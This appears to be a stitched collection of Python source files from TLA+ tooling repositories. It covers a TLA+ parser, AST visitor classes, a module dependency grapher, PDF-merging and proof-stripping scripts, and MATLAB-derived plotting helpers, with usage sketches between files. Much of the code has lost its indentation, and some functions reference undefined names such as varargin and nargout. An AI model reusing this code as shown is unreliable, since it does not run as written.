    q, X, Y = domain2vec(domain, resolution)  # nargout=3
    f = feval(func, q, **kwargs)
    Z, = vec2meshgrid(f, res2meshsize(resolution))
    # default level set values ?
    if (0 in values.shape):
        ax.contour(X, Y, Z)
    else:
        ax.contour(X, Y, Z, values)
    return
def ezsurf(func, domain, resolution, ax, **kwargs):
"""Vectorized ezsurf,
for functions accepting vector arguments.
input
ax = axes object handle
func = function handle
optional input
domain = rectangular plotting domain
= [xmin, xmax, ymin, ymax]
resolution = grid spacing
= [nx, ny]
varargin = additional arguments for input to func
@return (q, f) where:
- q = domain points
- f = function values at q
"""
# which axes ?
if (0 in ax.shape):
warn('vezsurf:axes', 'Axes object handle ax is empty, no plot.')
return varargout
# which domain ?
if not domain:
domain = np.array([0, 1, 0, 1]).reshape(1, -1)
# at what grid resolution ?
if not resolution:
resolution = np.array([30, 29]).reshape(1, -1)
else:
if (0 in resolution.shape):
resolution = np.array([30, 29]).reshape(1, -1)
q = domain2vec(domain, resolution)
f = feval(func, q, varargin[:])
vsurf(ax, q, f, resolution)
if nargout > 0:
varargout[0, 0] = q
varargout[0, 1] = f
return varargout
def surf(q, z, resolution,
ax=None, **kwargs):
"""Vectorized surf.
Vectorized wrapper for the surf function.
When q is 2-dimensional, then z is the height function.
When q is 3-dimensional, then z is the color function of the surface.
see also
mpl.plot_surface, vec2meshgrid
@param ax: axes object handle
@param q: coordinates of surface points
= [2 x #points] |
= [3 x #points], when color data are provided in vector z
@param z: row vector of height or color data for surface points
@type z: [1 x #points] | [], depending on the cases:
1) when size(q, 1) == 2, then z is assumed to be the values of a
scalar function to be plotted over the 2-dimensional domain defined
by the points in the matrix of column position vectors q.
2) when size(q, 1) == 3, then q are the coordinates of the points in
3-dimensional space, whereas z is assumed to be the row vector
specifying the surface color at each point.
special cases:
- [] (0 color)
- NaN (random colors)
- scalar (uniform color)
- 'scaled' (scaled colors indexed in colormap)
@param resolution: resolution of surface
@type resolution: [nx, ny] | [nx, ny, nz]
@return: surface object created.
"""
# depends
# vec2meshgrid, res2meshsize
if ax is None:
ax = newax()
# multiple axes ?
try:
surfaces = []
for curax in ax:
            surface = surf(q, z, resolution, ax=curax, **kwargs)
surfaces.append(surface)
return surfaces
except:
pass
# enough dimensions for surf ?
ndim = q.shape[0]
if ndim < 2:
raise Exception('space dim = q.shape[0] = 1.')
resolution = res2meshsize(resolution)
# Z ?
if z is None:
        z = np.zeros((1, q.shape[1]))
elif z is np.NaN:
z = 5 * np.random.rand(1, q.shape[1])
elif z == 'scaled':
z = np.array([])
else:
z = z * np.ones([1, q.shape[1] ])
# calc
if ndim < 3:
surface = surf2(q, z, resolution, ax, **kwargs)
else:
surface = surf_color(q, z, resolution, ax, **kwargs)
return surface
def surf2(q, z, res, ax, **kwargs):
X, Y = vec2meshgrid(q, res) # nargout=2
Z, = vec2meshgrid(z, res)
h = ax.plot_surface(X, Y, Z, **kwargs)
return h
def surf_color(q, c, res, ax, **kwargs):
X, Y, Z = vec2meshgrid(q, res) # nargout=3
# no color ?
if (0 in c.shape):
h = ax.plot_surface(X, Y, Z, **kwargs)
else:
C, = vec2meshgrid(c, res)
h = ax.plot_surface(X, Y, Z, cmap=C, **kwargs)
return h
```
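A usage sketch that ties the helpers above together, assuming the sibling modules `vectorized_meshgrid`, `multi_plot`, and `vectorized_plot` are importable as in this file's own imports; the paraboloid `z` is an illustrative choice:
```python
# Contour-plot a scalar field given as a row vector over grid points (sketch).
import numpy as np

from multi_plot import newax
from vectorized_meshgrid import domain2vec
from vectorized_plot import contour

domain = np.array([-1, 1, -1, 1]).reshape(1, -1)
resolution = np.array([30, 29]).reshape(1, -1)
q = domain2vec(domain, resolution)           # [2 x #points] grid coordinates
z = np.sum(q ** 2, axis=0).reshape(1, -1)    # [1 x #points] scalar values
ax = newax()
contour(q, z, resolution, ax=ax)
```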
{
"source": "johnyf/tla",
"score": 3
}
#### File: tla/examples/parsing_tla_expressions.py
```python
from tla import parser
from tla.to_str import Nodes
expr = r'''
\/ /\ x = 1
/\ x' = 2
\/ /\ x = 2
/\ x' = 1
'''
def parse_expr():
"""Parse a TLA+ expression."""
tree = parser.parse_expr(expr)
print(tree)
def parse_expr_and_pretty_print():
"""Parse and print a TLA+ expression."""
tree = parser.parse_expr(expr, nodes=Nodes)
s = tree.to_str(width=80)
print(s)
if __name__ == '__main__':
parse_expr()
parse_expr_and_pretty_print()
```
{
"source": "johnyf/tlapy",
"score": 3
}
#### File: tlapy/tlapy/tla_depends.py
```python
import argparse
import os
import re
import networkx as nx
def dump_dependency_graph(fname):
g = dependency_graph(fname)
pd = nx.drawing.nx_pydot.to_pydot(g)
pd.write_pdf('dependency_graph.pdf')
def dependency_graph(fname):
module, ext = os.path.splitext(fname)
assert ext == '.tla', ext
stack = [module]
g = nx.DiGraph()
while stack:
module = stack.pop()
modules = find_dependencies(module)
if modules is None:
continue
gen = ((module, v) for v in modules)
g.add_edges_from(gen)
stack.extend(modules)
return g
def find_dependencies(module):
fname = module + '.tla'
if not os.path.isfile(fname):
print('Cannot find file: {fname}'.format(fname=fname))
return
with open(fname, 'r') as f:
lines = f.readlines()
line, *_ = lines
m = re.match('-* MODULE ([a-zA-Z0-9]*) -*', line)
module_name, = m.groups()
extends_modules = list()
for line in lines:
if not line.startswith('EXTENDS'):
continue
line = line.lstrip()
s = line.split('EXTENDS', 1)[1]
modules = comma_to_list(s)
extends_modules.extend(modules)
return extends_modules
def comma_to_list(s):
r = s.split(',')
r = [t.strip() for t in r]
return r
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('fname', type=str,
help='Root TLA+ module file name')
args = parser.parse_args()
return args.fname
if __name__ == '__main__':
fname = parse_args()
dump_dependency_graph(fname)
```
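A usage sketch, assuming the module is importable as `tlapy.tla_depends` and that a root module file `Spec.tla` exists in the working directory; writing the PDF additionally requires `pydot` and Graphviz:
```python
# Build and inspect the EXTENDS dependency graph of a TLA+ module (sketch).
from tlapy.tla_depends import dependency_graph

g = dependency_graph('Spec.tla')
for u, v in g.edges():
    print('{u} EXTENDS {v}'.format(u=u, v=v))
```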
#### File: tlapy/utils/join_modules.py
```python
import argparse
import os
import shutil
import subprocess
from PyPDF2 import PdfFileReader
START = r'''
\documentclass[letter]{article}
\usepackage{pdfpages}
\usepackage{hyperref}
\usepackage{verbatim}
\usepackage{tocloft}
\usepackage{tlamath}
\renewcommand\cftsecdotsep{\cftdotsep}
%\pagenumbering{gobble}
\begin{document}
'''
MIDDLE = r'''
\maketitle
'''
MIDDLE_2 = r'''
\tableofcontents
\newpage
\verbatiminput{./LICENSE}
\newpage
'''
END = r'''
\end{document}
'''
MERGED_FILE = 'merged_tla_modules.pdf'
AUXDIR = '__tlacache__/.aux'
LICENSE = 'LICENSE'
DEFAULT_TITLE = r'TLA\textsuperscript{+} modules'
def join_modules():
paths, author_name, title_str, date_str, abstract = parse_args()
lines = list()
for path in paths:
stem, fname = os.path.split(path)
assert not stem, stem # relative path
name, ext = os.path.splitext(fname)
assert ext == '.pdf', path
# front matter
title = name.replace('_', r'\_')
pdf = PdfFileReader(open(path, 'rb'))
page_count = pdf.getNumPages()
if page_count > 1:
include_rest = '\includepdf[pages=2-]{' + fname + '}'
else:
include_rest = ''
more_lines = [
'\includepdf[pages=1,pagecommand={\phantomsection ' +
'\\addcontentsline{toc}{section}{' + title +
'} }]{' + fname + '}',
include_rest]
lines.extend(more_lines)
# copy file to aux dir
target = os.path.join(AUXDIR, fname)
print(target)
shutil.copy(path, target)
if os.path.isfile(LICENSE):
target = os.path.join(AUXDIR, LICENSE)
shutil.copy(LICENSE, target)
if os.path.isfile(abstract):
target = os.path.join(AUXDIR, abstract)
shutil.copy(abstract, target)
if title_str is None:
title_str = DEFAULT_TITLE
title = r'\title{' + title_str + '}'
if author_name is None:
author = ''
else:
author = r'\author{' + author_name + '}\n'
if date_str is None:
date = ''
else:
date = r'\date{' + date_str + '}\n'
if abstract is None:
abstract = ''
else:
abstract = (r'\begin{abstract}\input{' + abstract +
r'} \end{abstract}')
latex = (
START + title + date + author + MIDDLE + abstract +
MIDDLE_2 + '\n'.join(lines) + END)
# typeset using XeLaTeX
name, ext = os.path.splitext(MERGED_FILE)
assert ext == '.pdf', MERGED_FILE
fname = name + '.tex'
path = os.path.join(AUXDIR, fname)
with open(path, 'w') as f:
f.write(latex)
cmd = ['xelatex', '--interaction=nonstopmode', fname]
subprocess.call(cmd, cwd=AUXDIR)
# copy merged PDF to current dir
path = os.path.join(AUXDIR, MERGED_FILE) # merged PDF
shutil.copy(path, MERGED_FILE)
def parse_args():
p = argparse.ArgumentParser()
p.add_argument('files', nargs='+',
help='file names')
p.add_argument('-a', '--author', type=str,
help='Document author')
p.add_argument('--title', type=str,
help='Document title')
p.add_argument('--date', type=str,
help='Document date')
p.add_argument('--abstract', type=str,
help='Document abstract')
args = p.parse_args()
return (
args.files, args.author, args.title,
args.date, args.abstract)
if __name__ == '__main__':
join_modules()
```
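A sketch of driving the script programmatically, assuming the import path `tlapy.utils.join_modules`, that the aux directory `__tlacache__/.aux` exists, that `xelatex` is installed, and that `Foo.pdf` and `Bar.pdf` are pretty-printed modules in the current directory (all hypothetical names):
```python
# Merge two module PDFs into `merged_tla_modules.pdf` (sketch).
import sys

from tlapy.utils.join_modules import join_modules

sys.argv = [
    'join_modules.py', 'Foo.pdf', 'Bar.pdf',
    '--title', 'Example TLA+ modules']
join_modules()
```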
#### File: tlapy/utils/remove_proofs.py
```python
from __future__ import division
import argparse
import math
import logging
import os
import re
PROOF_SUFFIX = '_proofs'
HEADER_SUFFIX = '_header'
log = logging.getLogger(__name__)
def main():
"""Entry point."""
files, outdir = _parse_args()
for fname in files:
_remove_proofs(fname, outdir)
def _remove_proofs(fname, outdir):
"""Remove proofs from `fname` and dump result."""
base, ext = os.path.splitext(fname)
assert ext == '.tla', ext
assert base.endswith(PROOF_SUFFIX), base
with open(fname, 'r') as f:
lines = f.readlines()
new_lines = list()
inside_proof = False
last_indent = 0
for line in lines:
assert '\t' not in line, line
s = line.lstrip()
indent = len(line) - len(s)
is_dedent = indent <= last_indent
if is_dedent:
inside_proof = False
if re.match('<\d+>', s) is None:
if inside_proof:
continue
new_lines.append(line)
continue
inside_proof = True # omit lines
# rename module by removing "_proofs"
line = new_lines[0]
assert 'MODULE' in line, line
assert base in line, line
new_module = base.replace(PROOF_SUFFIX, HEADER_SUFFIX)
old_len = len(base) - len(PROOF_SUFFIX) + len(HEADER_SUFFIX)
assert len(new_module) == old_len, (new_module, base)
new_ln = line.replace(base, new_module)
# add dashes
missing_dashes = len(base) - len(new_module)
half = missing_dashes / 2
n = int(math.floor(half))
m = int(math.ceil(half))
assert n + m == missing_dashes, (n, m, missing_dashes)
new_ln = n * '-' + new_ln[:-1] + m * '-' + '\n'
assert len(new_ln) == len(line), (new_ln, line)
new_lines[0] = new_ln
# add notice that header has been auto-generated
text = (
'(* This file was automatically generated '
'from the file:\n')
line = (text + ' "{f}"\n*)\n').format(f=fname)
new_lines.insert(0, line)
# avoid overwriting source files
header_fname = new_module + '.tla'
header_path = os.path.join(outdir, header_fname)
if os.path.isfile(header_path):
with open(header_path, 'r') as f:
line = f.readline()
assert line.startswith(text), (line, text)
# dump header
print('Dump header to file "{h}"'.format(h=header_path))
content = ''.join(new_lines)
with open(header_path, 'w') as f:
f.write(content)
def _parse_args():
"""Return input file names and output directory."""
p = argparse.ArgumentParser()
p.add_argument('input', nargs='+', type=str,
help="input `*.tla` files")
p.add_argument('-o', '--outdir', type=str, default='.',
help='output directory')
args = p.parse_args()
files = args.input
outdir = args.outdir
log.info('input files: {fs}'.format(fs=files))
log.info('output directory: {d}'.format(d=outdir))
return files, outdir
if __name__ == '__main__':
main()
```
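A sketch of running the proof stripper, assuming the import path `tlapy.utils.remove_proofs` and a hypothetical input module `Foo_proofs.tla` in the current directory; the output `Foo_header.tla` is written to the default output directory `.`:
```python
# Strip proofs from `Foo_proofs.tla`, producing `Foo_header.tla` (sketch).
import sys

from tlapy.utils.remove_proofs import main

sys.argv = ['remove_proofs.py', 'Foo_proofs.tla']
main()
```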
#### File: tlapy/utils/renumber_proof_steps.py
```python
import collections
import re
# TODO: renumber proof levels 2..5
# This renumbering could be obtained by counting from 1 and restarting the
# count whenever a new level 1 step name is encountered.
def main(fname, start_line, end_line):
with open(fname, 'r') as f:
lines = f.readlines()
lines = lines[start_line : end_line]
spec = ''.join(lines)
# print(spec)
level = 1
pattern = '<{level}>\d+\.'.format(level=level)
step_names = re.findall(pattern, spec)
mapping = rename_steps(step_names, suffix='temp', level=level)
s = replace_step_names(mapping, spec)
# print(s)
temp_names = [
v for v in mapping.values()
if v.endswith('.')]
new_names = rename_steps(temp_names)
s = replace_step_names(new_names, s)
with open('input.tla', 'w') as f:
f.write(spec)
return s
def rename_steps(step_names, suffix='', level=1):
renaming = collections.OrderedDict()
for i, name in enumerate(step_names, 1):
new_name = '<{level}>{i}{temp}'.format(
level=level, i=i, temp=suffix)
# renaming the definition of the step name
renaming[name] = new_name + '.'
# renaming references to the step name
old_ref = name[:-1] + ' '
new_ref = new_name + ' '
renaming[old_ref] = new_ref
return renaming
def replace_step_names(step_names, s):
for old, new in step_names.items():
s = s.replace(old, new)
return s
if __name__ == '__main__':
fname = 'demo.tla'
start_line = 1300
end_line = 3500
spec = main(fname, start_line, end_line)
with open('renumbered.tla', 'w') as f:
f.write(spec)
```
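The two helpers above can be exercised on a small in-memory fragment; a self-contained sketch (the import path is an assumption):
```python
# Renumber level-1 proof steps in a toy proof fragment (sketch).
import re

from tlapy.utils.renumber_proof_steps import (
    rename_steps, replace_step_names)

spec = '<1>3. A\n<1>7. B BY <1>3 DEF B\n'
names = re.findall(r'<1>\d+\.', spec)
tmp = rename_steps(names, suffix='temp', level=1)
s = replace_step_names(tmp, spec)
final = rename_steps([v for v in tmp.values() if v.endswith('.')])
print(replace_step_names(final, s))
# <1>1. A
# <1>2. B BY <1>1 DEF B
```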
{
"source": "johnyf/tla",
"score": 2
}
#### File: johnyf/tla/setup.py
```python
from setuptools import setup
name = 'tla'
description = (
'Parser and abstract syntax tree for TLA+, '
'the temporal logic of actions.')
README = 'README.md'
long_description = open(README).read()
url = 'https://github.com/johnyf/{name}'.format(name=name)
VERSION_FILE = '{name}/_version.py'.format(name=name)
MAJOR = 0
MINOR = 0
MICRO = 2
version = '{major}.{minor}.{micro}'.format(
major=MAJOR, minor=MINOR, micro=MICRO)
s = (
'# This file was generated from `setup.py`\n'
"version = '{version}'\n").format(version=version)
install_requires = [
'infix >= 1.2',
'ply >= 3.4, <= 3.10',
]
tests_require = ['nose']
classifiers = [
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Topic :: Scientific/Engineering',
'Topic :: Software Development :: Compilers',
]
keywords = [
'TLA+', 'TLA', 'temporal logic of actions',
'formal', 'specification',
'expression', 'formula', 'module',
'mathematics', 'theorem', 'proof',
'parser', 'lexer', 'parsing',
'ast', 'abstract syntax tree', 'syntax tree',
'ply', 'lex',
]
def run_setup():
"""Write version file and install package."""
with open(VERSION_FILE, 'w') as f:
f.write(s)
setup(
name=name,
version=version,
description=description,
long_description=long_description,
long_description_content_type='text/markdown',
author='<NAME>',
author_email='<EMAIL>',
url=url,
license='BSD',
install_requires=install_requires,
tests_require=tests_require,
packages=[name],
package_dir={name: name},
classifiers=classifiers,
keywords=keywords)
if __name__ == '__main__':
run_setup()
```
#### File: tla/tla/_intf.py
```python
class Token(object):
"""Type of tokens."""
pass
# val bof : Loc.locus -> token (* beginning of file *)
# (** token representing start of file *)
def bof(locus):
"""Token representing beginning of file."""
return token
# val rep : token -> string
# (** String representation of tokens *)
def rep(token):
"""String representation of token."""
return string
# val locus : token -> Loc.locus
# (** Origin of the token *)
def locus(token):
"""Location of the token in text."""
return locus
# val eq : token -> token -> bool
# (** Are the tokens equivalent? *)
def eq(token, other_token):
"""Whether tokens are equivalent."""
return boolean
# val pp_print_token : Format.formatter -> token -> unit
# (** For use in format strings *)
def pp_print_token(formatter, token):
"""For use in format strings."""
pass
# end
# (** Precedence *)
# module type Prec = sig
# type prec
# (** Abstract type of precedence *)
class Prec(object):
"""Abstract type of operator precedence."""
pass
# val below : prec -> prec -> bool
# (** {!below} [p q] means that [p] is entirely below [q] *)
def below(prec, other_prec):
"""Whether `prec` is entirely below `other_prec`."""
return boolean
# val conflict : prec -> prec -> bool
# (** {!conflict} [p q] means that an unbracketed expression with
# two operators of precedence [p] and [q] respectively would be
# ambiguous. *)
def conflict(prec, other_prec):
"""Whether `prec` and `other_prec` have overlapping precedence ranges."""
return boolean
# end
```
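As an illustration of the `Prec` signature, one possible concrete realization represents a precedence as a `(low, high)` range and treats overlapping ranges as a conflict; this is a sketch of the intended semantics, not the implementation used by the `tla` package:
```python
# Hypothetical concrete precedence type for the interface sketched above.
class RangePrec:
    """Precedence as a closed integer range [low, high]."""
    def __init__(self, low, high):
        self.low = low
        self.high = high


def below(prec, other_prec):
    """Whether `prec` is entirely below `other_prec`."""
    return prec.high < other_prec.low


def conflict(prec, other_prec):
    """Whether an unbracketed mix of the two precedences is ambiguous."""
    return not (below(prec, other_prec) or below(other_prec, prec))


assert below(RangePrec(1, 3), RangePrec(4, 6))
assert conflict(RangePrec(2, 5), RangePrec(4, 6))
```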
#### File: tla/tla/iter.py
```python
import math
import textwrap
from tla.to_str import Nodes as _Nodes
LINE_WIDTH = 80
INDENT_WIDTH = 4
def _visit_bounds(
bounds, *arg, visitor=None, **kw):
"""Call the `visit` method of each bound."""
for name, kind, dom in bounds:
dom.visit(
*arg, visitor=visitor, **kw)
def _visit_usable(
usable, *arg, visitor=None, **kw):
for fact in usable['facts']:
fact.visit(
*arg, visitor=visitor, **kw)
for defn in usable['defs']:
defn.visit(
*arg, visitor=visitor, **kw)
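# Usage sketch (an assumption, not part of this module): each node class
# below defines `visit`, which recurses into its children and then calls
# `visitor(node)`, so a syntax tree built with these node classes can be
# walked bottom-up, for example to count nodes:
#
#     nodes_seen = []
#     tree.visit(visitor=nodes_seen.append)
#     print(len(nodes_seen), 'AST nodes visited')
#
# where `tree` would come from something like
# `parser.parse_expr(expr, nodes=Nodes)`, as in the parsing example earlier.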
class Nodes(_Nodes):
"""Translating TLA+ AST nodes to strings."""
# Builtin operators
class FALSE(_Nodes.FALSE):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class TRUE(_Nodes.TRUE):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class BOOLEAN(_Nodes.BOOLEAN):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class STRING(_Nodes.STRING):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Implies(_Nodes.Implies):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Equiv(_Nodes.Equiv):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Conj(_Nodes.Conj):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Disj(_Nodes.Disj):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Neg(_Nodes.Neg):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Eq(_Nodes.Eq):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Neq(_Nodes.Neq):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class SUBSET(_Nodes.SUBSET):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class UNION(_Nodes.UNION):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class DOMAIN(_Nodes.DOMAIN):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Subseteq(_Nodes.Subseteq):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Mem(_Nodes.Mem):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Notmem(_Nodes.Notmem):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Setminus(_Nodes.Setminus):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Cap(_Nodes.Cap):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Cup(_Nodes.Cup):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Prime(_Nodes.Prime):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class LeadsTo(_Nodes.LeadsTo):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class ENABLED(_Nodes.ENABLED):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class UNCHANGED(_Nodes.UNCHANGED):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Cdot(_Nodes.Cdot):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class WhilePlus(_Nodes.WhilePlus):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Box(_Nodes.Box):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Diamond(_Nodes.Diamond):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Opaque(_Nodes.Opaque):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Internal(_Nodes.Internal):
def visit(self, *arg, visitor=None, **kw):
self.value.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Apply(_Nodes.Apply):
def visit(self, *arg, visitor=None, **kw):
self.op.visit(
*arg, visitor=visitor, **kw)
for arg_ in self.operands:
arg_.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Function(_Nodes.Function):
def visit(self, *arg, visitor=None, **kw):
_visit_bounds(
self.bounds,
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class FunctionApply(_Nodes.FunctionApply):
def visit(self, *arg, visitor=None, **kw):
self.op.visit(
*arg, visitor=visitor, **kw)
for arg_ in self.args:
arg_.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class ShapeExpr(_Nodes.ShapeExpr):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class ShapeOp(_Nodes.ShapeOp):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Lambda(_Nodes.Lambda):
def visit(self, *arg, visitor=None, **kw):
for name, shape in self.name_shapes:
shape.visit(
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class TemporalSub(_Nodes.TemporalSub):
def visit(self, *arg, visitor=None, **kw):
self.op.visit(
*arg, visitor=visitor, **kw)
self.action.visit(
*arg, visitor=visitor, **kw)
self.subscript.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Sub(_Nodes.Sub):
def visit(self, *arg, visitor=None, **kw):
self.op.visit(
*arg, visitor=visitor, **kw)
self.action.visit(
*arg, visitor=visitor, **kw)
self.subscript.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class BoxOp(_Nodes.BoxOp):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class DiamondOp(_Nodes.DiamondOp):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Dot(_Nodes.Dot):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Parens(_Nodes.Parens):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
self.pform.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Syntax(_Nodes.Syntax):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class NamedLabel(_Nodes.NamedLabel):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class IndexedLabel(_Nodes.IndexedLabel):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class If(_Nodes.If):
def visit(self, *arg, visitor=None, **kw):
self.test.visit(
*arg, visitor=visitor, **kw)
self.then.visit(
*arg, visitor=visitor, **kw)
self.else_.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Let(_Nodes.Let):
def visit(self, *arg, visitor=None, **kw):
for defn in self.definitions:
defn.visit(
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Forall(_Nodes.Forall):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Exists(_Nodes.Exists):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class RigidQuantifier(_Nodes.RigidQuantifier):
def visit(self, *arg, visitor=None, **kw):
self.quantifier.visit(
*arg, visitor=visitor, **kw)
_visit_bounds(
self.bounds,
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class TemporalQuantifier(_Nodes.TemporalQuantifier):
def visit(self, *arg, visitor=None, **kw):
self.quantifier.visit(
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Choose(_Nodes.Choose):
def visit(self, *arg, visitor=None, **kw):
if self.bound is not None:
self.bound.visit(
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Case(_Nodes.Case):
def visit(self, *arg, visitor=None, **kw):
for guard, expr in self.arms:
guard.visit(
*arg, visitor=visitor, **kw)
expr.visit(
*arg, visitor=visitor, **kw)
self.other.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class SetEnum(_Nodes.SetEnum):
def visit(self, *arg, visitor=None, **kw):
for expr in self.exprs:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class SetSt(_Nodes.SetSt):
def visit(self, *arg, visitor=None, **kw):
self.bound.visit(
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class SetOf(_Nodes.SetOf):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
_visit_bounds(
self.boundeds,
*arg, visitor=visitor, **kw)
visitor(self)
# type of junction list
class And(_Nodes.And):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Or(_Nodes.Or):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class List(_Nodes.List):
def visit(self, *arg, visitor=None, **kw):
self.op.visit(
*arg, visitor=visitor, **kw)
for expr in self.exprs:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Record(_Nodes.Record):
def visit(self, *arg, visitor=None, **kw):
for name, expr in self.items:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class RecordSet(_Nodes.RecordSet):
def visit(self, *arg, visitor=None, **kw):
for name, expr in self.items:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Except_dot(_Nodes.Except_dot):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Except_apply(_Nodes.Except_apply):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Except(_Nodes.Except):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
for expoints, expr in self.exspec_list:
expr.visit(
*arg, visitor=visitor, **kw)
for expoint in expoints:
expoint.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Domain(_Nodes.Domain):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class NoDomain(_Nodes.NoDomain):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Ditto(_Nodes.Ditto):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Bounded(_Nodes.Bounded):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
self.visibility.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Unbounded(_Nodes.Unbounded):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Visible(_Nodes.Visible):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Hidden(_Nodes.Hidden):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class NotSet(_Nodes.NotSet):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class At(_Nodes.At):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Arrow(_Nodes.Arrow):
def visit(self, *arg, visitor=None, **kw):
self.expr1.visit(
*arg, visitor=visitor, **kw)
self.expr2.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Tuple(_Nodes.Tuple):
def visit(self, *arg, visitor=None, **kw):
for expr in self.exprs:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Bang(_Nodes.Bang):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
for sel in self.sel_list:
sel.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class WeakFairness(_Nodes.WeakFairness):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class StrongFairness(_Nodes.StrongFairness):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class String(_Nodes.String):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Number(_Nodes.Number):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Fairness(_Nodes.Fairness):
def visit(self, *arg, visitor=None, **kw):
self.op.visit(
*arg, visitor=visitor, **kw)
self.subscript.visit(
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class SelLab(_Nodes.SelLab):
def visit(self, *arg, visitor=None, **kw):
for expr in self.exprs:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class SelInst(_Nodes.SelInst):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class SelNum(_Nodes.SelNum):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class SelLeft(_Nodes.SelLeft):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class SelRight(_Nodes.SelRight):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
